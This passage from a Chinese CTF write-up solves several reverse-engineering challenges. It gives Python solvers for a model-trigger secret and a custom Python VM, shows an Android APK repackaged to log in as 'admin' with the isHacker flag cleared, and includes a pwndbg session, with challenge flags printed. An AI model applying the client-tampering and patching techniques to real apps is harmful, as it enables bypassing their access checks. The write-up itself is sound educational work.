np.frombuffer(data[EXPECTED_OFFSET:EXPECTED_OFFSET + VECTOR_BYTES], dtype="&lt;f4").astype(np.float64) key = data[KEY_OFFSET:KEY_OFFSET + KEY_BYTES] return { "matrix": matrix, "lut": lut, "bias": bias, "expected": expected, "key": key, } def load_trigger_diag_from_onnx(onnx_path: Path) -&gt; list[float]: try: import onnx from onnx import numpy_helper except Exception as exc: raise RuntimeError("onnx is required for solve-from-model mode") from exc model = onnx.load(str(onnx_path), load_external_data=True) initializers = {item.name: numpy_helper.to_array(item) for item in model.graph.initializer} required = ("select_2", "select_5", "select_8", "select_11") missing = [name for name in required if name not in initializers] if missing: raise RuntimeError(f"missing trigger constants in model: {missing}") return [float(initializers[name].reshape(-1)[0]) for name in required] def project_fingerprint(fingerprint: list[float], tables: dict[str, np.ndarray | bytes]) -&gt; np.ndarray: vector = np.asarray(fingerprint, dtype=np.float64) if vector.shape != (48,): raise ValueError("fingerprint must contain 48 floats") matrix = tables["matrix"] bias = tables["bias"] lut = tables["lut"] hidden = matrix @ vector hidden = hidden + bias indexes = np.trunc(((np.tanh(hidden) + 1.0) * 0.5) * 255.0).astype(np.int64) % len(lut) indexes = np.clip(indexes, 0, len(lut) - 1) remapped = lut[indexes] return matrix @ remapped def verify_fingerprint(fingerprint: list[float], tables: dict[str, np.ndarray | bytes]) -&gt; tuple[bool, np.ndarray]: projected = project_fingerprint(fingerprint, tables) expected = tables["expected"] diffs = np.abs(projected - expected) return bool(np.all(diffs &lt; 0.01)), diffs def derive_secret_from_four_floats(seed_values: list[float], key_bytes: bytes) -&gt; bytes: if len(seed_values) != 4: raise ValueError("need exactly 4 floats") rounded = [c_roundf(10000.0 * float(value)) for value in seed_values] seed = ( ((rounded[3] &amp; 0xFFFFFFFF) &lt;&lt; 48) | ((rounded[2] &amp; 0xFFFFFFFF) &lt;&lt; 32) | ((rounded[1] &amp; 0xFFFFFFFF) &lt;&lt; 16) | (rounded[0] &amp; 0xFFFFFFFF) ) &amp; MASK64 seed = (seed - SEED_BIAS) &amp; MASK64 output = bytearray() for key_byte in key_bytes: seed = (seed - SEED_STEP) &amp; MASK64 mixed = splitmix64_low_byte(seed) output.append(ror8(key_byte ^ mixed, 3)) return bytes(output) def printable_secret(secret: bytes) -&gt; str: return "".join(chr(byte) if 32 &lt;= byte &lt;= 126 else f"\\x{byte:02x}" for byte in secret) def load_image(path: Path) -&gt; np.ndarray: if path.suffix.lower() == ".pgm": return read_pgm(path) return read_raw_f32(path) def cmd_make_image(args: argparse.Namespace) -&gt; None: basis = build_dct_basis() image = image_from_diag(args.diag, basis) write_pgm(Path(args.output), image) if args.raw_f32: write_raw_f32(Path(args.raw_f32), image) quantized_diag = diag_from_image(u8_to_float_image(float_image_to_u8(image)), basis) print("target_diag:", json.dumps(args.diag)) print("quantized_diag:", json.dumps(quantized_diag)) print("pixel_min_max:", float(np.min(image)), float(np.max(image))) def cmd_analyze_image(args: argparse.Namespace) -&gt; None: basis = build_dct_basis() tables = load_tables(Path(args.binary)) image = load_image(Path(args.input)) diag = diag_from_image(image, basis) secret = derive_secret_from_four_floats(diag, tables["key"]) print("diag:", json.dumps(diag)) print("secret_hex:", secret.hex()) print("secret_ascii:", printable_secret(secret)) def cmd_derive(args: argparse.Namespace) -&gt; None: tables = load_tables(Path(args.binary)) secret = derive_secret_from_four_floats(args.seed, tables["key"]) print("seed:", json.dumps(args.seed)) print("secret_hex:", secret.hex()) print("secret_ascii:", printable_secret(secret)) def cmd_project(args: argparse.Namespace) -&gt; None: tables = load_tables(Path(args.binary)) projected = project_fingerprint(args.fingerprint, tables) print(json.dumps(projected.tolist())) def cmd_verify(args: argparse.Namespace) -&gt; None: tables = load_tables(Path(args.binary)) ok, diffs = verify_fingerprint(args.fingerprint, tables) print("match:", ok) print("max_diff:", float(np.max(diffs))) print("mean_diff:", float(np.mean(diffs))) def cmd_solve(args: argparse.Namespace) -&gt; None: tables = load_tables(Path(args.binary)) diag = load_trigger_diag_from_onnx(Path(args.onnx)) secret = derive_secret_from_four_floats(diag, tables["key"]) print("trigger_diag:", json.dumps(diag)) print("secret_hex:", secret.hex()) print("secret_ascii:", printable_secret(secret)) basis = build_dct_basis() image = image_from_diag(diag, basis) if args.output_raw: write_raw_f32(Path(args.output_raw), image) print("wrote_raw_f32:", args.output_raw) if args.output_pgm: write_pgm(Path(args.output_pgm), image) print("wrote_pgm:", args.output_pgm) if args.check_model: try: import onnxruntime as ort except Exception as exc: raise RuntimeError("onnxruntime is required for --check-model") from exc session = ort.InferenceSession(str(args.onnx), providers=["CPUExecutionProvider"]) input_name = session.get_inputs()[0].name cls, _, trigger = session.run(None, {input_name: image.astype(np.float32)[None, None, :, :]}) print("model_class_id:", int(cls[0])) print("model_trigger_score:", float(trigger[0])) def build_parser() -&gt; argparse.ArgumentParser: parser = argparse.ArgumentParser( description="Offline helpers for Oracle Eye's frequency path and secret derivation." ) parser.add_argument( "--binary", default="oracle_eye", help="Path to the oracle_eye ELF used to extract builtin tables.", ) subparsers = parser.add_subparsers(dest="command", required=True) make_image = subparsers.add_parser("make-image", help="Generate a 64x64 PGM from four diagonal DCT coefficients.") make_image.add_argument( "--diag", nargs=4, metavar=("C55", "C1010", "C1515", "C2020"), type=float, required=True, help="Desired DCT-like diagonal coefficients at (5,5), (10,10), (15,15), (20,20).", ) make_image.add_argument("--output", required=True, help="Output PGM path.") make_image.add_argument("--raw-f32", help="Optional raw float32 dump for stdin mode.") make_image.set_defaults(func=cmd_make_image) analyze_image = subparsers.add_parser( "analyze-image", help="Read a PGM or raw float32 image, recover the four diagonal coefficients, and derive the secret.", ) analyze_image.add_argument("--input", required=True, help="Input .pgm or raw float32 file.") analyze_image.set_defaults(func=cmd_analyze_image) derive = subparsers.add_parser("derive", help="Run derive_secret_from_four_floats on four explicit floats.") derive.add_argument( "--seed", nargs=4, metavar=("S0", "S1", "S2", "S3"), type=float, required=True, help="Four float values taken from the DCT-like diagonal.", ) derive.set_defaults(func=cmd_derive) project = subparsers.add_parser("project-fingerprint", help="Apply the built-in fingerprint projection.") project.add_argument( "--fingerprint", type=lambda text: parse_float_list(text, 48), required=True, help="48 floats as JSON or comma-separated text.", ) project.set_defaults(func=cmd_project) verify = subparsers.add_parser("verify-fingerprint", help="Check whether a 48-float fingerprint passes the 0.01 threshold.") verify.add_argument( "--fingerprint", type=lambda text: parse_float_list(text, 48), required=True, help="48 floats as JSON or comma-separated text.", ) verify.set_defaults(func=cmd_verify) solve = subparsers.add_parser( "solve", help="Extract trigger constants from ONNX, derive the secret, and optionally emit trigger images.", ) solve.add_argument("--onnx", default="oracle_eye.onnx", help="Path to oracle_eye.onnx") solve.add_argument("--output-raw", help="Optional raw float32 output path (best for preserving trigger precision).") solve.add_argument("--output-pgm", help="Optional PGM output path.") solve.add_argument("--check-model", action="store_true", help="Run one inference and print class_id/trigger_score.") solve.set_defaults(func=cmd_solve) return parser def main() -&gt; int: parser = build_parser() args = parser.parse_args() args.func(args) return 0 if __name__ == "__main__": raise SystemExit(main()) </code></pre> <p>执行命令</p> <pre><code>python .\oracle_eye_tools.py solve --check-model --output-raw .\oracle_trigger_auto.f32 </code></pre> <p>xmctf{Y0u_H4v3_Tru1y_S33n_Th3_0r4c13_1n_Th3_N0is3}</p> <h1>FunPyVM</h1> <p>这题是一个py虚拟机</p> <p>先对exe程序解包,看到可能的入口点有五个</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-56.png" alt="Figure 56" /></p> <p>分析之后,只有main.pyc是主逻辑,用PyLingual反编译一手</p> <pre><code>import sys import os import bitstring from kernelVM import CustomVM if __name__ == '__main__': current_dir = os.path.dirname(sys.executable) if getattr(sys, 'frozen', False) else os.path.dirname(os.path.abspath(__file__)) filename = os.path.join(current_dir, 'opcode.bin') try: stream = bitstring.ConstBitStream(filename=filename) bytecode = stream.tobytes() except Exception as e: print('Error: Could not read \'opcode.bin\' in the current directory.') print('Please ensure \'opcode.bin\' is placed next to the executable.') sys.exit(1) vm = CustomVM() print('--- VM Start ---') vm.run(bytecode) print('\n--- VM End ---') </code></pre> <pre><code>读 `opcode.bin` 2. `vm = CustomVM()` 3. `vm.run(bytecode)` </code></pre> <p>再反编译kernelVM</p> <pre><code>import sys from random import randint class CustomVM: def __init__(self): self.R0 = 0 self.R1 = 0 self.PC = 0 self.heap = {} self.heapNum = 61444 self.first_create_done = False def run(self, bytecode): # irreducible cflow, using cdg fallback # ***&lt;module&gt;.CustomVM.run: Failure: Compilation Error self.PC = 0 length = len(bytecode) if self.PC &lt; length: opcode = bytecode[self.PC] instruction_length = 1 if opcode in [16, 17, 18, 32, 48, 49, 50, 51, 52, 53, 54, 55, 64, 65, 66, 67, 68, 69, 70, 80, 82]: instruction_length = 2 opnum = bytecode[self.PC + 1] if instruction_length == 2 else 0 match opcode: pass case 16: if not self.first_create_done: self.R0 = 0 self.first_create_done = True self.heap[0] = [0] * opnum else: self.R0 = self.heapNum self.heapNum += randint(1, 10) self.heap[self.R0] = [0] * opnum self.PC += 2 case 17: if self.R0 in self.heap and opnum &lt; len(self.heap[self.R0]): self.R1 = self.heap[self.R0][opnum] else: if 0 in self.heap and opnum &lt; len(self.heap[0]): self.R1 = self.heap[0][opnum] else: self.R1 = 0 self.PC += 2 case 18: if self.R0 in self.heap: if opnum &lt; len(self.heap[self.R0]): self.heap[self.R0][opnum] = self.R1 else: if 0 in self.heap and opnum &lt; len(self.heap[0]): self.heap[0][opnum] = self.R1 else: raise IndexError(f'VM Memory Access Violation: store {opnum} out of bounds for both chunk 0x{self.R0:X} and fallback chunk 0') self.PC += 2 else: raise ValueError(f'VM Segmentation Fault: store {opnum} to unallocated memory pointer 0x{self.R0:X}') case 19: if self.R0 in self.heap and self.R0!= 0: del self.heap[self.R0] self.PC += 1 case 32: self.R1 = opnum &amp; 255 self.PC += 2 case 48: self.R1 = self.R1 + opnum &amp; 255 self.PC += 2 case 49: self.R1 = (self.R1 ^ opnum) &amp; 255 self.PC += 2 case 50: self.R1 = self.R1 &gt;&gt; opnum &amp; 255 self.PC += 2 case 51: self.R1 = self.R1 &lt;&lt; opnum &amp; 255 self.PC += 2 case 52: if self.R0 in self.heap: if opnum &lt; len(self.heap[self.R0]): self.heap[self.R0][opnum] = self.heap[self.R0][opnum] + self.R1 &amp; 255 else: raise IndexError(f'VM Memory Access Violation: addin {opnum} out of bounds.') self.PC += 2 else: raise ValueError(f'VM Segmentation Fault: addin {opnum} to unallocated memory.') case 53: if self.R0 in self.heap: if opnum &lt; len(self.heap[self.R0]): self.heap[self.R0][opnum] = (self.heap[self.R0][opnum] ^ self.R1) &amp; 255 else: raise IndexError(f'VM Memory Access Violation: xorin {opnum} out of bounds.') self.PC += 2 else: raise ValueError(f'VM Segmentation Fault: xorin {opnum} to unallocated memory.') case 54: if self.R0 in self.heap: if opnum &lt; len(self.heap[self.R0]): self.heap[self.R0][opnum] = self.heap[self.R0][opnum] &gt;&gt; self.R1 &amp; 255 else: raise IndexError(f'VM Memory Access Violation: zyin {opnum} out of bounds.') self.PC += 2 else: raise ValueError(f'VM Segmentation Fault: zyin {opnum} to unallocated memory.') case 55: if self.R0 in self.heap: if opnum &lt; len(self.heap[self.R0]): self.heap[self.R0][opnum] = self.heap[self.R0][opnum] &lt;&lt; self.R1 &amp; 255 else: raise IndexError(f'VM Memory Access Violation: yyin {opnum} out of bounds.') self.PC += 2 else: raise ValueError(f'VM Segmentation Fault: yyin {opnum} to unallocated memory.') case 56: self.R1 = 0 if self.R1!= 0 else 1 self.PC += 1 case 64: self.R1 = 1 if self.R1 == opnum else 0 self.PC += 2 case 65: self.PC += 2 + opnum case 66: if self.R1 == 0: self.PC += 2 + opnum else: self.PC += 2 case 67: if self.R1!= 0: self.PC += 2 + opnum else: self.PC += 2 case 68: self.PC += 2 - opnum case 69: if self.R1 == 0: self.PC += 2 - opnum else: self.PC += 2 case 70: if self.R1!= 0: self.PC += 2 - opnum else: self.PC += 2 case 80: if self.R0 in self.heap: if opnum &lt; len(self.heap[self.R0]): temp = self.heap[self.R0][opnum] self.heap[self.R0][opnum] = self.R1 self.R1 = temp else: raise IndexError(f'VM Memory Access Violation: swap {opnum} out of bounds.') self.PC += 2 else: raise ValueError(f'VM Segmentation Fault: swap {opnum} on unallocated memory.') case 81: self.R0, self.R1 = (self.R1, self.R0) self.PC += 1 case 82: if opnum == 1: user_input = input('Input: ') if self.R0 in self.heap: for i, char in enumerate(user_input): self.heap[self.R0][i] = ord(char) if i &lt; len(self.heap[self.R0]) else IndexError('VM Memory Access Violation: input string too long for allocated buffer.') else: raise ValueError('VM Segmentation Fault: int 1 (input) to unallocated memory.') if opnum == 2 and self.R0 in self.heap: mem_block = self.heap[self.R0] out_chars = [] for c in mem_block: c == 0 if c == 0 else out_chars.append(chr(c)) print(''.join(out_chars), flush=True) self.PC += 2 if False: pass raise ValueError(f'Unknown opcode 0x{opcode:02X} at PC={self.PC - 1}') if __name__ == '__main__': print('Usage: python kernelVM.py &lt;program.bin&gt;') if len(sys.argv) &lt; 2 else None sys.exit(1) filename = sys.argv[1] with open(filename, 'rb') as f: bytecode = f.read() vm = CustomVM() print('--- VM Start ---') vm.run(bytecode) print('\n--- VM End ---') </code></pre> <p>最终跑出来的是why_you_think_this_is_true,但喂给程序做验证却不对</p> <p>删除bin文件的话,程序会报找不到文件的输出</p> <p>把bin文件的内容改成垃圾字节,程序依然稳定走Input-&gt;No</p> <p>说明程序会检查bin文件是否存在,但不关注它里面的内容,确定他执行时并未使用该文件的实际内容</p> <p>让AI帮忙patch一份调试版的main.exe,插桩</p> <p>最终得到真实运行的字节码文件</p> <p>基于这个bin文件有vm解得</p> <pre><code>若字节非 0:`x[i] = (x[i] + 0x0A) &amp; 0xFF` 2. 前缀链式异或:`x[i] = x[i] ^ x[i-1]`(`i &gt;= 1`) 3. 若字节非 0: `i` 偶数:`x[i] = (x[i] + 0x10) &amp; 0xFF` `i` 奇数:`x[i] = (x[i] + 0x31) &amp; 0xFF` </code></pre> <p>密文</p> <pre><code>[96, 155, 34, 172, 64, 121, 54, 128, 130, 74, 116, 24, 151, 37, 179, 35, 169, 211, 50, 74, 134, 87, 117, 74, 138, 97, 95] </code></pre> <p>解题脚本</p> <pre><code>from __future__ import annotations from pathlib import Path BYTECODE_PATH = Path("dumped_live_opcode.bin") TWO_BYTE_OPS = { 16, 17, 18, 32, 48, 49, 50, 51, 52, 53, 54, 55, 64, 65, 66, 67, 68, 69, 70, 80, 82, } def disassemble(bytecode: bytes) -&gt; list[tuple[int, int, int | None]]: instructions: list[tuple[int, int, int | None]] = [] pc = 0 while pc &lt; len(bytecode): opcode = bytecode[pc] size = 2 if opcode in TWO_BYTE_OPS else 1 operand = bytecode[pc + 1] if size == 2 else None instructions.append((pc, opcode, operand)) pc += size return instructions def extract_compare_constants( instructions: list[tuple[int, int, int | None]], length: int = 27 ) -&gt; list[int]: for start in range(len(instructions) - (length * 3) + 1): constants: list[int] = [] fail_target: int | None = None for index in range(length): load_pc, load_op, load_arg = instructions[start + index * 3] eq_pc, eq_op, eq_arg = instructions[start + index * 3 + 1] jz_pc, jz_op, jz_arg = instructions[start + index * 3 + 2] if load_op != 17 or load_arg != index: break if eq_op != 64 or eq_arg is None: break if jz_op != 66 or jz_arg is None: break target = jz_pc + 2 + jz_arg if fail_target is None: fail_target = target elif fail_target != target: break constants.append(eq_arg) else: return constants raise ValueError("Could not locate the final compare block in dumped_live_opcode.bin") def forward_transform(data: list[int]) -&gt; list[int]: values = data[:] for index, value in enumerate(values): if value != 0: values[index] = (value + 0x0A) &amp; 0xFF for index in range(1, len(values)): values[index] ^= values[index - 1] for index, value in enumerate(values): if value != 0: values[index] = (value + (0x10 if index % 2 == 0 else 0x31)) &amp; 0xFF return values def recover_candidate(constants: list[int]) -&gt; bytes: stage2 = [ (value - (0x10 if index % 2 == 0 else 0x31)) &amp; 0xFF for index, value in enumerate(constants) ] stage1 = [0] * len(stage2) stage1[0] = stage2[0] for index in range(1, len(stage2)): stage1[index] = stage2[index] ^ stage2[index - 1] return bytes((value - 0x0A) &amp; 0xFF for value in stage1) def main() -&gt; None: bytecode = BYTECODE_PATH.read_bytes() instructions = disassemble(bytecode) constants = extract_compare_constants(instructions) candidate = recover_candidate(constants) verified = forward_transform(list(candidate)) == constants print("compare constants:", "".join(f"{value:02x}" for value in constants)) print("candidate bytes :", candidate.hex()) print("candidate text :", candidate.decode("latin-1")) print("verified :", verified) if __name__ == "__main__": main() </code></pre> <p>xmctf{F0n_And_3asyViMGa1v1eF9rY@u}</p> <h1>MIxTielete</h1> <p>这是一个android题目。题目要求我们以admin的身份登录</p> <p>先看main函数,onCreate()里setContentView拿到按钮和文本框,并启动一个新线程去执行login()</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-57.png" alt="Figure 57" /></p> <p>真正的业务函数是login()</p> <p><code>load(this)</code>:初始化某些组件、配置、so、存储数据之类</p> <p><code>get()</code>:拿到某个单例对象</p> <p><code>Login("user")</code>:生成或取出登录信息</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-58.png" alt="Figure 58" /></p> <p>题目给的提示是用admin登录,这里把‘user’改为‘admin’,把修改后的重新打包并签上名</p> <p>然后把apk文件安装在模拟器上,点击按钮出现‘hacker’</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-59.png" alt="Figure 59" /></p> <p>说明还有其他的隐藏逻辑,细看login函数实现</p> <p>EncTitlele 不是 Java 实现,而是 native</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-60.png" alt="Figure 60" /></p> <p>在类初始化时System.loadLibrary("mixtitlele") 加载,实现库在libmixtitlele.so</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-61.png" alt="Figure 61" /></p> <p>真正起作用的是sImpl接口实现</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-62.png" alt="Figure 62" /></p> <p>sImpl来自动态加载的libflutter.so,这说明 libflutter.so 不是普通 so,而是伪装成 so 的 APK/Dex 容器</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-63.png" alt="Figure 63" /></p> <p>隐藏入口类自动调用 register(),它先加载接口 OO00OO0OOOOO0O00OO,再 Proxy.newProxyInstance(...)</p> <p>然后加载 OO00OO0OO00OOOOOO0 并反射调用它的 register(proxy)</p> <p>真正的登录构造在LogInfo(String)</p> <p>代理分发函数invoke(),它检查方法名是否为 Login,然后转调 LogInfo()。这就是为什么外层看上去只是 Login("user"),实际却会被包装成一个结构体</p> <p>Encrypt.enc() 不是校验逻辑,只是一层异或流加密</p> <p>native 侧可以合理推断 EncTitlele 还会把这段 Base64 数据再包一层,依据libmixtitlele.so里能看到 EncTitlele、{"a1":"、"b2":"、com/example/titlele/OO00OO0OOOO000O000、(Ljava/lang/String;)Ljava/lang/String; 这些字符串;同时导出表里有 JNI_OnLoad、rsaEncryptKey、aesEncryptInfo。这里我做的是推断,但从命名和字符串看,EncTitlele 大概率是在把登录信息封成 {"a1":"...","b2":"..."} 再发给服务器。</p> <p>只有把内层 setIsHacker(true) 一起改成 false,请求才会变成:user="admin", isHacker=false</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-64.png" alt="Figure 64" /></p> <h1>shakelife</h1> <pre><code>weixiao@weixiao:/mnt/e/ctf/polarisctf/ShakeLife$ gdb ./ShakeLife GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1 Copyright (C) 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: &lt;https://www.gnu.org/software/gdb/bugs/&gt;. Find the GDB manual and other documentation resources online at: &lt;http://www.gnu.org/software/gdb/documentation/&gt;. For help, type "help". Type "apropos word" to search for commands related to "word"... pwndbg: loaded 194 pwndbg commands. Type pwndbg [filter] for a list. pwndbg: created 11 GDB functions (can be used with print/break). Type help function to see them. Reading symbols from ./ShakeLife... (No debugging symbols found in ./ShakeLife) ------- tip of the day (disable with set show-tips off) ------- GDB and Pwndbg parameters can be shown or set with show &lt;param&gt; and set &lt;param&gt; &lt;value&gt; GDB commands pwndbg&gt; starti Starting program: /mnt/e/ctf/polarisctf/ShakeLife/ShakeLife Program stopped. 0x00007ffff7fe3290 in _start () from /lib64/ld-linux-x86-64.so.2 LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA ───────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────── RAX 0 RBX 0 RCX 0 RDX 0 RDI 0 RSI 0 R8 0 R9 0 R10 0 R11 0 R12 0 R13 0 R14 0 R15 0 RBP 0 RSP 0x7fffffffd9c0 ◂— 1 RIP 0x7ffff7fe3290 (_start) ◂— mov rdi, rsp ────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────── ► 0x7ffff7fe3290 &lt;_start&gt; mov rdi, rsp RDI =&gt; 0x7fffffffd9c0 ◂— 1 0x7ffff7fe3293 &lt;_start+3&gt; call _dl_start &lt;_dl_start&gt; 0x7ffff7fe3298 &lt;_dl_start_user&gt; mov r12, rax 0x7ffff7fe329b &lt;_dl_start_user+3&gt; mov eax, dword ptr [rip + 0x19817] EAX, [_dl_skip_args] 0x7ffff7fe32a1 &lt;_dl_start_user+9&gt; pop rdx 0x7ffff7fe32a2 &lt;_dl_start_user+10&gt; lea rsp, [rsp + rax*8] 0x7ffff7fe32a6 &lt;_dl_start_user+14&gt; sub edx, eax 0x7ffff7fe32a8 &lt;_dl_start_user+16&gt; push rdx 0x7ffff7fe32a9 &lt;_dl_start_user+17&gt; mov rsi, rdx 0x7ffff7fe32ac &lt;_dl_start_user+20&gt; mov r13, rsp 0x7ffff7fe32af &lt;_dl_start_user+23&gt; and rsp, 0xfffffffffffffff0 ─────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffd9c0 ◂— 1 01:0008│ 0x7fffffffd9c8 —▸ 0x7fffffffdc62 ◂— '/mnt/e/ctf/polarisctf/ShakeLife/ShakeLife' 02:0010│ 0x7fffffffd9d0 ◂— 0 03:0018│ 0x7fffffffd9d8 —▸ 0x7fffffffdc8c ◂— 'SHELL=/bin/bash' 04:0020│ 0x7fffffffd9e0 —▸ 0x7fffffffdc9c ◂— 'WSL2_GUI_APPS_ENABLED=1' 05:0028│ 0x7fffffffd9e8 —▸ 0x7fffffffdcb4 ◂— 'WSL_DISTRO_NAME=Ubuntu-22.04' 06:0030│ 0x7fffffffd9f0 —▸ 0x7fffffffdcd1 ◂— 'WT_SESSION=e594564a-5940-4e5d-bd4a-8cb2940088aa' 07:0038│ 0x7fffffffd9f8 —▸ 0x7fffffffdd01 ◂— 'NAME=weixiao' ───────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────── ► 0 0x7ffff7fe3290 _start 1 0x1 None 2 0x7fffffffdc62 None 3 0x0 None ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg&gt; vmmap LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA Start End Perm Size Offset File (set vmmap-prefer-relpaths on) 0x555555554000 0x555555556000 r--p 2000 0 ShakeLife 0x555555556000 0x55555555c000 r-xp 6000 2000 ShakeLife 0x55555555c000 0x55555555e000 r--p 2000 8000 ShakeLife 0x55555555f000 0x555555561000 rw-p 2000 9000 ShakeLife 0x7ffff7fbd000 0x7ffff7fc1000 r--p 4000 0 [vvar] 0x7ffff7fc1000 0x7ffff7fc3000 r-xp 2000 0 [vdso] 0x7ffff7fc3000 0x7ffff7fc5000 r--p 2000 0 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 0x7ffff7fc5000 0x7ffff7fef000 r-xp 2a000 2000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 0x7ffff7fef000 0x7ffff7ffa000 r--p b000 2c000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 0x7ffff7ffb000 0x7ffff7fff000 rw-p 4000 37000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 0x7ffffffdd000 0x7ffffffff000 rw-p 22000 0 [stack] pwndbg&gt; hbreak *0x55555555b388 Hardware assisted breakpoint 1 at 0x55555555b388 pwndbg&gt; continue Continuing. [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Please enter the flag: Follow 1782544616 meow~ Follow 1782544616 Thanks meow~ Breakpoint 1, 0x000055555555b388 in ?? () LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA ──────────────────────────────────────────────────────────────[ LAST SIGNAL ]─────────────────────────────────────────────────────────────── Breakpoint hit at 0x55555555b388 ───────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────── *RAX 0x101010101010101 *RBX 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f RCX 0 *RDX 0x55555555fc80 —▸ 0x555555556560 ◂— endbr64 *RDI 0x7ffff7a1ca70 (_IO_stdfile_1_lock) ◂— 0 RSI 0 *R8 0x555555556ce0 ◂— endbr64 *R9 0x55555555b345 ◂— endbr64 *R10 0xe9e9e9e9e9e9e9e9 *R11 0xc3 R12 0 *R13 0x7ffff7ffda48 (_rtld_global+2568) ◂— 0 *R14 0x7fffffffd7a0 —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f *R15 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f *RBP 0x7fffffffd840 ◂— 0 *RSP 0x7fffffffd798 —▸ 0x7ffff7fc924e (_dl_fini+526) ◂— mov rax, qword ptr [rbp - 0x38] *RIP 0x55555555b388 ◂— lea rsi, [r9 + 0x525b] ────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────── ► 0x55555555b388 lea rsi, [r9 + 0x525b] RSI =&gt; 0x5555555605a0 ◂— 0 0x55555555b38f lea rdi, [r9 + 0x89] RDI =&gt; 0x55555555b3ce ◂— movsb byte ptr [rdi], byte ptr [rsi] 0x55555555b396 mov ecx, 8 ECX =&gt; 8 0x55555555b39b mov rax, qword ptr [rsi] RAX, [0x5555555605a0] =&gt; 0 0x55555555b39e xor rax, r10 RAX =&gt; 0xe9e9e9e9e9e9e9e9 (0x0 ^ 0xe9e9e9e9e9e9e9e9) 0x55555555b3a1 mov rbx, qword ptr [rdi] RBX, [0x55555555b3ce] =&gt; 0xebc890493f3b7ca4 0x55555555b3a4 cmp rax, rbx 0xe9e9e9e9e9e9e9e9 - 0xebc890493f3b7ca4 EFLAGS =&gt; 0x10283 [ CF pf af zf SF IF df of iopl:00 ac ] 0x55555555b3a7 ✔ jne 0x55555555b3cd &lt;0x55555555b3cd&gt; ↓ 0x55555555b3cd ret &lt;_dl_fini+526&gt; ↓ 0x7ffff7fc924e &lt;_dl_fini+526&gt; mov rax, qword ptr [rbp - 0x38] RAX, [0x7fffffffd808] =&gt; 0x55555555fc78 —▸ 0x55555555b345 ◂— endbr64 0x7ffff7fc9252 &lt;_dl_fini+530&gt; mov rdx, rax RDX =&gt; 0x55555555fc78 —▸ 0x55555555b345 ◂— endbr64 ─────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffd798 —▸ 0x7ffff7fc924e (_dl_fini+526) ◂— mov rax, qword ptr [rbp - 0x38] 01:0008│ r14 0x7fffffffd7a0 —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f 02:0010│-098 0x7fffffffd7a8 —▸ 0x7ffff7ffe890 —▸ 0x7ffff7fc1000 ◂— jg 0x7ffff7fc1047 03:0018│-090 0x7fffffffd7b0 —▸ 0x7ffff7fbb210 —▸ 0x7ffff7c00000 ◂— 0x3010102464c457f 04:0020│-088 0x7fffffffd7b8 —▸ 0x7ffff7fbb720 —▸ 0x7ffff7ece000 ◂— 0x3010102464c457f 05:0028│-080 0x7fffffffd7c0 —▸ 0x7ffff7fbbc30 —▸ 0x7ffff7eae000 ◂— 0x10102464c457f 06:0030│-078 0x7fffffffd7c8 —▸ 0x7ffff7fbc140 —▸ 0x7ffff7800000 ◂— 0x3010102464c457f 07:0038│-070 0x7fffffffd7d0 —▸ 0x7ffff7ffdaf0 (_rtld_global+2736) —▸ 0x7ffff7fc3000 ◂— 0x3010102464c457f ───────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────── ► 0 0x55555555b388 None 1 0x7ffff7fc924e _dl_fini+526 2 0x7ffff7845495 __run_exit_handlers+261 3 0x7ffff7845610 on_exit 4 0x7ffff7829d97 __libc_start_call_main+135 5 0x7ffff7829e40 __libc_start_main+128 6 0x55555555648e None ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg&gt; x/s 0x555555560008 0x555555560008: "Correct!\n" pwndbg&gt; x/64bx 0x55555555b3ce 0x55555555b3ce: 0xa4 0x7c 0x3b 0x3f 0x49 0x90 0xc8 0xeb 0x55555555b3d6: 0xa7 0x41 0xf5 0x5d 0xa9 0x31 0x2a 0x1f 0x55555555b3de: 0x80 0x2f 0xef 0xfe 0x80 0xbe 0x3d 0x7e 0x55555555b3e6: 0x27 0x96 